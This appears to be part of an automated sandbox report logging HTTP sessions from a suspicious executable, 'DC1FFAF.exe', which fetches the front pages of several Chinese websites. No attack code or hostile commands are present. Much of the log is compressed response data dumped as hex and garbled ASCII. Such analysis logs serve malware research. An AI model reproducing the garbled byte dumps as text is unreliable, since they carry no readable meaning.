                                                                                                                                    8192.168.2.649722163.181.199.19980420C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Aug 6, 2024 10:29:16.787736893 CEST218OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Accept-Language: zh-CN
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Host: www.1688.com
                                                                                                                                    Range: bytes=0-
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Aug 6, 2024 10:29:17.685672045 CEST466INHTTP/1.1 302 Found
                                                                                                                                    Server: Tuser
                                                                                                                                    Date: Tue, 06 Aug 2024 08:29:17 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 242
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Location: https://www.1688.com/
                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 72 65 73 69 64 65 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 64 65 72 20 61 20 64 69 66 66 65 72 65 6e 74 20 55 52 49 2e 3c 2f 70 3e 0d 0a 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>302 Found</h1><p>The requested resource resides temporarily under a different URI.</p><hr/>Powered by Tuser</body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    9192.168.2.64972349.51.65.18180420C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Aug 6, 2024 10:29:16.826683998 CEST214OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Accept-Language: zh-CN
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Host: soso.com
                                                                                                                                    Range: bytes=0-
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Aug 6, 2024 10:29:17.430496931 CEST347INHTTP/1.1 301 Moved Permanently
                                                                                                                                    Server: nginx
                                                                                                                                    Date: Tue, 06 Aug 2024 08:29:17 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 162
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Location: https://soso.com/
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    10192.168.2.649724103.235.46.9880420C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Aug 6, 2024 10:29:16.943627119 CEST220OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Accept-Language: zh-CN
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Host: www.hao123.com
                                                                                                                                    Range: bytes=0-
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Aug 6, 2024 10:29:18.185978889 CEST1236INHTTP/1.1 200 OK
                                                                                                                                    Content-Encoding: gzip
                                                                                                                                    Content-Type: text/html;charset=UTF-8
                                                                                                                                    Cxy_all: +3745d112b7393a11424b230c7d3d1188
                                                                                                                                    Date: Tue, 06 Aug 2024 08:29:18 GMT
                                                                                                                                    Lfy: gznj.80207
                                                                                                                                    P3p: CP=" OTI DSP COR IVA OUR IND COM "
                                                                                                                                    Server: nginx/1.9.12
                                                                                                                                    Set-Cookie: s_ht_pageid=16; path=/; domain=.hao123.com
                                                                                                                                    Set-Cookie: ft=1; expires=Tue, 06-Aug-2024 15:59:59 GMT
                                                                                                                                    Set-Cookie: v_pg=normal
                                                                                                                                    Set-Cookie: hz=0; path=/; domain=www.hao123.com
                                                                                                                                    Set-Cookie: BAIDUID=BFD17A804D36F2FA6E9D72DC5618B404:FG=1; expires=Wed, 06-Aug-25 08:29:18 GMT; max-age=31536000; path=/; domain=.hao123.com; version=1
                                                                                                                                    Tracecode: 17576734200245533962080616
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Data Raw: 38 39 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 6b 97 23 c9 75 20 f6 7d 7e 05 d8 ed 61 77 0d 91 59 48 bc 81 62 53 ec 27 39 96 86 1a 0f 87 12 b9 e4 a8 4e 02 48 54 61 1a 05 40 78 74 75 b3 a6 ce 91 f7 ac 1e d6 ca d6 ae bd bb 5e 5b f6 d9 2f f6 59 ed 9e b3 92 65 cb 7b b4 96 b8 fe 31 ab 19 52 9f fc 17 7c 1f 11 91 37 1e 99 48 54 75 f7 70 49 b1 38 33 00 32 32 e2 c6 8d 1b f7 1d 37 be fe 95 27 bf fe f8 e3 1f 7c f8 b4 76 be bd 98 7f e3 eb f8 ef da 78 9e 6e 36 0f ee dc 81 af 59 3a f9 c6 d7 17 cb cd 78 3d 5b 6d bf f1 f5 8b 6c 9b 42 cb ed 2a ca 7e 7b 37 7b f1 e0 ce 3a 9b ae b3 cd f9 9d da 78 b9 d8 66 8b ed 83 3b 8d 93 da f7 3e fa b5 07 f7 8e 7f e5 f4 54 bf 78 7a 1a 3d 48 ee dd a9 1d 7f e3 eb c7 79 67 db d9 76 9e 7d e3 3c 5d 26 cd d6 e9 df fe d5 1f fe f4 27 ff f4 6f ff fa bf fb d9 ff fb 3f fd dd ef ff d1 e7 7f f3 3b 9f ff eb 7f fc f5 63 6e f3 f5 51 ba c9 6a db 74 7d 96 c1 08 a7 a3 79 ba 78 0e d0 11 34 e3 f3 74 bd c1 9f 77 db 69 d4 bf 03 43 b8 40 7e 3f fa de c3 e8 f1 f2 62 95 6e 67 a3 79 96 83 fa fe d3 07 d9 e4 [TRUNCATED]
                                                                                                                                    Data Ascii: 896k#u }~awYHbS'9NHTa@xtu^[/Ye{1R|7HTupI83227'|vxn6Y:x=[mlB*~{7{:xf;>Txz=Hygv}<]&'o?;cnQjt}yx4twiC@~?bngy,A\(Mvfz6BLuj|_^:?3Yl&5MdggxY^;>a<{u\O6bdmw>?9['~_T7/?z?ofIddQ/_/
                                                                                                                                    Aug 6, 2024 10:29:18.186007977 CEST897INData Raw: c7 7f f8 b3 ff fb 1f 7d f1 ff fc 93 9f fe cf ff e8 6f ff ea df 7d f1 2f 7e 5f 82 fa 9f 7e e7 1f 42 83 2f fe c7 7f ff c5 3f fb f7 9f ff e4 9f 7f fe 93 bf f8 d9 bf fe bd ff f4 3b ff f5 df fd ab ff eb 6f ff c3 3f 81 0f 9f ff 1f 7f fc b3 3f ff 4b f8
                                                                                                                                    Data Ascii: }o}/~_~B/?;o??K_?w{?T}{ogo~O|'??~#2mxSVr,/o?>>W7i:dcjmwE>_
                                                                                                                                    Aug 6, 2024 10:29:18.186022997 CEST1236INData Raw: f1 f9 fd ec e8 ea ce 6e 31 c9 a6 b3 45 36 b9 f3 95 07 c8 c1 97 d3 5a 3a 5f 9e 7d f5 ab f8 ef fb 77 b2 97 e3 6c 85 92 26 9e ce d6 19 a0 9e de bc 53 bf ba d8 9c 0d b3 f8 22 db 6c d2 b3 ec b3 cf b2 58 08 f3 3a 28 6e e7 c3 3b 20 ee b2 97 c0 90 86 2c
                                                                                                                                    Data Ascii: n1E6Z:_}wl&S"lX:(n; ,O?se8-b%G}&k0%iaz[!zIX$M"Of/y}O&'fU?o;n}\_gn[G!]gi}UgadN& =mlydC
                                                                                                                                    Aug 6, 2024 10:29:18.186043978 CEST1236INData Raw: 36 c1 fd 53 b8 31 0d 65 9b fd 90 ee b6 cb 6b a6 a6 f1 79 36 7e 0e 30 1a ea 02 5d 63 89 ac d2 b0 7f 31 8f 5c 28 f3 cb 8b dd c5 28 5b 7f 02 ab af c4 1d a9 09 00 f3 6c 11 29 32 2e 68 08 7a 86 dd f0 4a 49 16 01 da 06 28 79 7c 1e a4 6d 9c 12 2d dd 89
                                                                                                                                    Data Ascii: 6S1eky6~0]c1\(([l)2.hzJI(y|m-RXt8`9pC41+j##:gn5_{%B]O;obH8++i@`S,_$kx6~bNTNDj9ZVuEQp4q3g?yKK N
                                                                                                                                    Aug 6, 2024 10:29:18.186058044 CEST1236INData Raw: 1d 18 d0 67 a8 8a 13 a0 90 20 b3 89 f9 2f eb 38 42 1a da da 58 25 dc 9b 51 1d 4e d6 af cc c9 9c 1e 86 e9 14 b5 f1 db 33 9c bc 5f ee 51 68 50 61 19 9a 0c 00 3d b4 77 1a 46 94 4a af a5 56 23 85 aa 91 e0 e7 5b 82 4a ab 80 a1 6b cf e0 f4 c1 54 f4 40
                                                                                                                                    Data Ascii: g /8BX%QN3_QhPa=wFJV#[JkT@!=T>#j,2D Ay0JW(M[5X&+K&Z#$R Dq(,5pm$rglSHRj{(6wGegyKu?qb>SNK_%>e=dwj<_n
                                                                                                                                    Aug 6, 2024 10:29:18.186073065 CEST1236INData Raw: 95 02 11 0d cc 66 c6 1d fd 96 77 33 5a 52 4a 9b a0 80 25 25 6a 47 4c 47 81 fd 5c b8 ca 7b b6 31 2d 6d c1 6e 2b dc c6 4c 0f e5 db b8 ac e3 fd db 18 d2 0e 4a a9 5f 3f 0f 91 be 7a 16 c0 08 61 af 64 1f ab e7 05 1b 79 00 22 b8 ca e6 e5 84 09 82 bf c6
                                                                                                                                    Data Ascii: fw3ZRJ%%jGLG\{1-mn+LJ_?zady"} IvVK^y-MEiywxof@I-VE2/c<gp3/Q*/28raN7n^30]-l2|xqyM6,[y^j
                                                                                                                                    Aug 6, 2024 10:29:18.186089993 CEST1236INData Raw: 6c e8 7f f7 ea 35 a8 70 e7 3d 80 9f bf a5 b0 f1 31 16 2b b4 e8 38 bc 38 81 33 a0 6a 7b 3b c7 72 29 0f 48 15 72 82 62 43 72 95 0b 57 5d 4d 98 a8 e4 1d 20 8b 0d 14 f3 83 e4 6f f3 09 d6 6e 36 11 5f e9 f9 a6 9c 0b 72 1f e1 37 dd ae dc 03 db b8 ab c5
                                                                                                                                    Data Ascii: l5p=1+883j{;r)HrbCrW]M on6_r7"<UYq+N- O%tlR\7<Q-.(YLU8W&bSZ7U5::%{]()T1(opP(WIf5(o'4sX^K
                                                                                                                                    Aug 6, 2024 10:29:18.186191082 CEST1236INData Raw: a9 09 96 9b a9 25 9b 1a 5c ab 88 37 49 66 35 76 09 e6 b5 cc 4b da ec b3 89 02 1b 96 ea e4 6b f0 36 bb f1 18 ae 9e d0 e0 dd b6 bb 29 5c 78 70 9b be 62 50 93 15 3f cf 77 0e 12 5e 01 a6 a1 3d 14 c1 2c 21 13 0c 03 69 e5 b5 e5 8a 04 fa c1 93 53 0e d7
                                                                                                                                    Data Ascii: %\7If5vKk6)\xpbP?w^=,!iS@Zr}UUGXbD[-qHGMKC>byU]*Ho"(;47#cM`).+&fFo|H7!e|(T9xU9uNlY62uV*x)
                                                                                                                                    Aug 6, 2024 10:29:18.186206102 CEST1236INData Raw: 60 a1 2b c3 5c 2a f7 48 48 bd 4d 8a 09 24 6d 42 89 e5 32 5f 07 59 dd 92 94 68 10 6b df c3 de f2 fb a4 02 fe fe 46 64 2d 86 c0 c7 fb 6a f7 8f df 77 85 19 8e af 86 cb 7b 28 1d 8d 04 ab 02 85 94 1b 2d b3 49 aa e3 74 c4 a6 92 b8 5d ed 46 c0 18 cf 35
                                                                                                                                    Data Ascii: `+\*HHM$mB2_YhkFd-jw{(-It]F5Ot(D-m+Ggm=P:uB?#yyn&NnHP#v1vq@$~f]iHbmAJn`FTwZd;%xGNDvw
                                                                                                                                    Aug 6, 2024 10:29:18.186219931 CEST1236INData Raw: 49 9b 34 f9 15 c0 73 91 81 83 c5 67 cf 0a 00 b3 5f f3 65 be 82 7b da c5 3f 50 78 ce 97 db e8 6c b9 9c 6c e0 d4 05 fe 87 a2 10 30 d2 4b bc aa 0e 82 d1 43 13 ad f6 6c 3f a5 e3 37 7b 88 21 8d be 06 86 29 b4 7d 60 9c a5 b0 1f 55 3f b8 f3 c4 1e 9f 64
                                                                                                                                    Data Ascii: I4sg_e{?Pxll0KCl?7{!)}`U?dY+I%u,Wt]FcEytECe8J3f&~l^F$Y=y>A6 X{*9M$~5%e\.[q/~|ki#&"
                                                                                                                                    Aug 6, 2024 10:29:18.190907955 CEST1236INData Raw: 2e a0 88 0f d7 f5 f0 b1 af 98 48 13 9d 1d 25 af 07 d6 ad c8 96 a4 d3 73 82 18 72 c9 00 31 27 5f f6 d1 f2 47 09 9d 5c 44 0a 80 32 4e 90 93 02 36 df e5 90 cb f0 a8 fd 07 d6 48 76 21 79 5e 68 10 69 fa b9 dd 90 c4 e6 7b 0f 21 a3 a1 d6 6e 34 2e 36 b5
                                                                                                                                    Data Ascii: .H%sr1'_G\D2N6Hv!y^hi{!n4.6,;pXP2X[e^!d,+s(<s_O 5vT=*DWN{U|gs!p]j*iA }oSjCV JS+;@C_VZ/P'}-R4Wo)7psa9bQ8


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    11192.168.2.649725163.181.92.23180420C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Aug 6, 2024 10:29:17.015280008 CEST223OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Accept-Language: zh-CN
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Host: www.eastmoney.com
                                                                                                                                    Range: bytes=0-
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Aug 6, 2024 10:29:17.665350914 CEST544INHTTP/1.1 301 Moved Permanently
                                                                                                                                    Server: Tuser
                                                                                                                                    Date: Tue, 06 Aug 2024 08:29:17 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 262
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Location: https://www.eastmoney.com/
                                                                                                                                    Via: ens-cache4.de5[,0]
                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                    EagleId: a3b55c9817229329575621760e
                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 68 61 73 20 62 65 65 6e 20 61 73 73 69 67 6e 65 64 20 61 20 6e 65 77 20 70 65 72 6d 61 6e 65 6e 74 20 55 52 49 2e 3c 2f 70 3e 0d 0a 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>301 Moved Permanently</h1><p>The requested resource has been assigned a new permanent URI.</p><hr/>Powered by Tuser</body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    12192.168.2.64972647.94.225.22180420C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Aug 6, 2024 10:29:17.156378984 CEST220OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Accept-Language: zh-CN
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Host: www.jmw.com.cn
                                                                                                                                    Range: bytes=0-
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Aug 6, 2024 10:29:18.760914087 CEST367INHTTP/1.1 301 Moved Permanently
                                                                                                                                    Server: nginx/1.26.0
                                                                                                                                    Date: Tue, 06 Aug 2024 08:29:18 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 169
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Location: https://www.jmw.com.cn/
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.26.0</center></body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    13192.168.2.649727113.219.142.3580420C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Aug 6, 2024 10:29:17.229490995 CEST218OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Accept-Language: zh-CN
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Host: www.cdstm.cn
                                                                                                                                    Range: bytes=0-
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Aug 6, 2024 10:29:18.935287952 CEST464INHTTP/1.1 302 Moved Temporarily
                                                                                                                                    Server: JSP3/2.0.14
                                                                                                                                    Date: Tue, 06 Aug 2024 08:29:18 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 144
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Location: https://www.cdstm.cn/
                                                                                                                                    X-Cache-Status: MISS
                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                    Strict-Transport-Security: max-age=63072000;includeSubdomains;preload
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 4a 53 50 33 2f 32 2e 30 2e 31 34 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>JSP3/2.0.14</center></body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    14192.168.2.649728120.26.110.17080420C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Aug 6, 2024 10:29:17.234642982 CEST218OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Accept-Language: zh-CN
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Host: foodmate.net
                                                                                                                                    Range: bytes=0-
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Aug 6, 2024 10:29:18.328675032 CEST1236INHTTP/1.1 200 OK
                                                                                                                                    Server: nginx
                                                                                                                                    Date: Tue, 06 Aug 2024 08:29:18 GMT
                                                                                                                                    Content-Type: text/html; charset=gbk
                                                                                                                                    Last-Modified: Tue, 06 Aug 2024 08:19:48 GMT
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    ETag: W/"66b1dca4-295e4"
                                                                                                                                    Content-Encoding: gzip
                                                                                                                                    Data Raw: 34 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 6b 73 5a 57 b6 28 fa bd ab ce 7f 60 d3 f7 ec 38 d5 1b f1 46 92 63 ab 2b 3b e9 47 ee ee 4e e7 9c ce b9 e7 9e ea ea 72 21 09 59 c4 7a b5 84 62 3b 77 df f3 f5 fe 0e 84 63 4b b2 1c f1 46 bc 84 90 10 e2 0d 02 04 8a ec f8 21 3f 12 39 b6 13 5b 89 1f b2 9d ba 63 ac c9 82 05 2c 58 0b 16 b2 9d bd 93 54 59 c0 5a 73 ce 31 c6 1c 73 cc 31 c7 1c 8f 63 ff f4 fe 5f de fb f8 7f 7d f4 3b d1 b0 61 74 44 f4 d1 ff f8 d7 3f 7d f0 9e 48 2c 91 4a ff a7 f2 3d a9 f4 fd 8f df 17 fd df 7f fc f8 cf 7f 12 c9 bb 64 a2 8f 27 b5 63 53 7a 83 7e 7c 4c 3b 22 95 fe ee 43 b1 48 3c 6c 30 4c 1c 95 4a 4f 9f 3e dd 75 5a d9 35 3e 79 52 fa f1 7f 97 9e c1 be e4 d8 b8 f4 51 62 60 b4 ec 1a 34 0c 8a fb 7e 75 8c 1a f0 cc e8 c8 d8 d4 71 96 6e e4 bd bd bd a4 35 f5 ae 4e 3b 08 7f 46 75 06 2d 00 6a 98 90 e8 fe 31 ad ff f4 b8 f8 bd f1 31 83 6e cc 20 f9 f8 ec 84 4e 2c 1a 20 df 8e 8b 0d ba 33 06 29 f6 ff 8e 68 60 58 3b 39 a5 33 1c 3f d9 af 50 ca 15 62 29 f4 62 d0 1b 46 74 7d 31 5b d8 e5 fd ce bc 97 7c [TRUNCATED]
                                                                                                                                    Data Ascii: 4000ksZW(`8Fc+;GNr!Yzb;wcKF!?9[c,XTYZs1s1c_};atD?}H,J=d'cSz~|L;"CH<l0LJO>uZ5>yRQb`4~uqn5N;Fu-j11n N, 3)h`X;93?Pb)bFt}1[|j_oU6gwog_?Qo>_GB!>oLQ:OII%S'paMi?9F=qE5C}XB;+@=y!m&]zH~f/R`(Qt&X&856=-0wq.EM qF|387Yw7G$1-Xgr\|M37)a4QN&u#SiH"i:mxR7DqZ?zkh||pTkuRtH)6j?5<uXOu:=Sh|Ay"I.Z4<~k|L799>y|hzl0=9&2LNII$D#z5hjrO1<+w]O.T9r@"t>Rt6$c)[!(b:,CLf#C$A-6/mF?h
                                                                                                                                    Aug 6, 2024 10:29:18.328697920 CEST1236INData Raw: 75 d2 4f a6 a4 c3 e3 a3 ba 13 f5 d4 a9 5e 65 1a 5c 65 0c 69 d7 01 41 31 75 4a 3f 26 1d d4 0d 69 a7 47 0c 52 bd 4e 43 89 0b 14 aa ed 30 32 1b 9a 23 da b1 93 d2 cf 86 25 03 63 52 fc d8 69 02 92 35 20 05 49 3d a4 6f b7 f3 e6 1b 01 4c ce e8 78 3f 4c
                                                                                                                                    Data Ascii: uO^e\eiA1uJ?&iGRNC02#%cRi5 I=oLx?LVKuoGGtr!%|,LSv)P"hB>J$}|b>Iv|Qhn%+UxXyd^qcRmE-A}cSR9lV|
                                                                                                                                    Aug 6, 2024 10:29:18.328712940 CEST1236INData Raw: 69 3f 3d 81 76 ad 13 20 9d 00 b2 3a 4d 61 7a 4a 37 59 33 4a f5 11 91 d2 c4 01 14 65 0f 25 dc a0 0b 4a 8b a4 f4 0e 9e 60 9f 9c 06 3b 93 5e 5a 0f 2c 5a 0a 5b ec e8 13 96 7e e8 ed 6e ea 34 68 30 ee 03 51 72 b7 95 4e 47 b5 fa 91 11 fd 14 cc 47 1d 31
                                                                                                                                    Data Ascii: i?=v :MazJ7Y3Je%J`;^Z,Z[~n4h0QrNGG1ONPB"\hjUSX`Kncf{Cyaf'u`u20Nvl@W;JFKrcwos}hkq]hovdhc/uS;H
                                                                                                                                    Aug 6, 2024 10:29:18.328726053 CEST1236INData Raw: 47 d1 81 66 b5 e8 37 96 a5 26 83 53 06 b9 ea 91 e9 56 ed 8e dc 5b 22 7a d2 17 68 b6 9a 55 94 e3 0a 38 b2 54 2f 2f 98 2d 6c d8 e6 e0 4a 14 5e e4 4e 34 b0 d8 04 ed b2 21 9b 65 f4 92 21 bb 8d 05 ae c4 05 4e f9 12 a7 9a 0a 4f 70 61 9d 1a 1f 63 c1 1c
                                                                                                                                    Data Ascii: Gf7&SV["zhU8T//-lJ^N4!e!NOpac9%pwl.D\?21E`?nBt\Msax*f&QhUk&jPgl\iHcs/_g5U^/dEM>-PTmJQmPZ?4i.~Nfm&vP'lnM?Mn
                                                                                                                                    Aug 6, 2024 10:29:18.328738928 CEST1236INData Raw: 7a 61 b6 80 3a d5 a0 0e 76 3e 11 3b 6a a9 1c 28 d6 2d 91 01 b9 14 92 6e 05 1d b1 43 05 d4 94 22 76 de 1c 8a d1 77 5f a0 5d 9e d4 8f 49 fa c7 0d 86 f1 d1 a3 b2 89 33 ef d4 ef 8d bc 99 4f 29 03 86 a8 d5 b3 da 22 66 37 45 4c 60 3f a5 44 a6 94 28 7b
                                                                                                                                    Data Ascii: za:v>;j(-nC"vw_]I3O)"f7EL`?D({^1W*Yl9zsg-Z/}WPWC,V$)iBL9st*R0#}*8\PIQkRYTR)zh)=w-v.eooc
                                                                                                                                    Aug 6, 2024 10:29:18.328754902 CEST1236INData Raw: a0 df b6 90 f5 ba 36 8c 96 54 2c b1 4b d3 16 f2 05 ff b4 42 d9 28 50 dd 71 ad a4 af 01 a5 05 b5 17 84 19 87 b1 30 f8 cc 6c 65 62 e6 cc 67 fd c1 b0 f7 c0 ed 4e 6c c7 76 b3 fe cd 0b eb b7 5c 7e c4 06 e7 a4 32 1b ed b5 13 84 89 a2 f9 21 69 c9 b5 f9
                                                                                                                                    Data Ascii: 6T,KB(Pq0lebgNlv\~2!iC,Z6?8lf~GYt+>{O0t76.db&]eI/i>TlNpE]k`mM#[_]#jdLy30k=Lpfi~,W2 Jqp
                                                                                                                                    Aug 6, 2024 10:29:18.328778982 CEST1236INData Raw: 6b b5 85 10 e8 15 1c 77 73 68 2d 77 1f 04 97 d6 e7 50 a1 46 96 f5 5d 5e 7a 58 58 8a bd 0c 5f cb af 7a 9f 59 96 6d 85 b0 5f dc c7 ef 3d 41 90 72 28 1a 59 6f e1 0a c6 dd a1 93 1c ba 8d 60 60 32 44 fd c8 c0 21 63 16 64 b7 a2 37 b2 25 01 ca ab 88 03
                                                                                                                                    Data Ascii: kwsh-wPF]^zXX_zYm_=Ar(Yo``2D!cd7%}+oZCW}ypqg XmK8,+}CqYy/r7N@rRr(h+E_^VLW_RYM>]dV:v!
